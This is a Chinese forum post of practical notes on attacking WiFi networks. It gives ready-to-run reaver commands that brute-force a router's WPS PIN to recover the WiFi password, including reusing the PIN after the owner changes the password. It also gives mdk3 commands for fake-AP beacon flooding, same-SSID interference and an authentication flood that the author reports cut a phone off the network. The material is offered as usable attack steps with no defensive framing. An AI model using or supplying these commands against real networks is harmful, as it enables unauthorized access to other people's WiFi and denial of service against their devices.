电脑疯子技术论坛|电脑极客社区

微信扫一扫 分享朋友圈

已有 1259 人浏览分享

Reaver跑pin码+Mdk3无线攻击笔记

[复制链接]
1259 0
Reaver跑pin码破解wifi

PIN码共分为8位 按 4 3 1分段 总共穷举有11000种组合。通过获取到PIN码 并记住
Bssid和PIN后期可以通过一条命令爆出无线密码。
容易碰到的问题:连接超时 卡住 路由自保护等
和实例1一样先启动网卡:

QQ截图20210809144747.png

嗅探模式
查看MB有没有能破解的WiFi
airodump-ng wlan0mon

QQ截图20210809144911.png

MB是54e.的可破解 54e不可破解。这个我这没有显示 但我还是尝试跑了一下 依旧是自家的701;
开始破解跑PIN
  1. reaver -i wlan0mon -b DC:72:9B:9B:65:F4 -vv
复制代码

69.png

最终可以得到wifi的PIN码和密码 把他们记下来。如果wifi主人过段时间更改密码 一般来说不会改PIN码
这时只需加上-p命令 WiFi密码即可破出;
  1. reaver -i wlan0mon -b MAC地址 -p PIN码
复制代码

此方法受信号强度和WPS保护机制等影响 破解需要很长时间 容易连接超时。
实例四-Mdk3无线攻击
1>伪造AP攻击
无线黑客通过创建大量虚假AP基站信号来干扰正常无线通信。可以使用mdk3这款工具实战 通过无线网卡发射伪造的
AP信号还能根据需要设定伪造的AP的工作频道 一般位干扰目标AP的同一频道。

mdk3 wlan0mon b -g -c 6 -h 7
݇b 用于伪造AP时使用的模式;
g 伪造提供54M即满足802.11g标准的无线网络;
c 针对的无线工作频道 这里不超过13即可;
h 用于提升攻击效率 只针对个别无线设备有效;

QQ截图20210809145154.png

可以看见出现了几个扰乱的AP攻击信号 点击时没反应的 上不了网。
2>SSID无线干扰
对于在某一频道正常工作的无线接入点 攻击者除了可以发送相同频道外 还可以发送相同SSID的无线数据
流量信号来扰乱链接该AP的无限客户端的正常运作。
  1. mdk3 wlan0mon b -n zcc -g -c 6
  2. n 是使用指定的SSID来代替随机生成的SSID
复制代码

68.png

3>身份认证攻击(洪水攻击)
  1. mdk3 wlan0mon a -a 48:FD:A3:F0:BB:98
  2. 48:FD:A3:F0:BB:98是我连接WiFi的的手机mac地址
复制代码

66.png

目标手机成功上不了网

18.png

您需要登录后才可以回帖 登录 | 注册

本版积分规则

1

关注

0

粉丝

9021

主题
精彩推荐
热门资讯
网友晒图
图文推荐

Powered by Pcgho! X3.4

© 2008-2022 Pcgho Inc.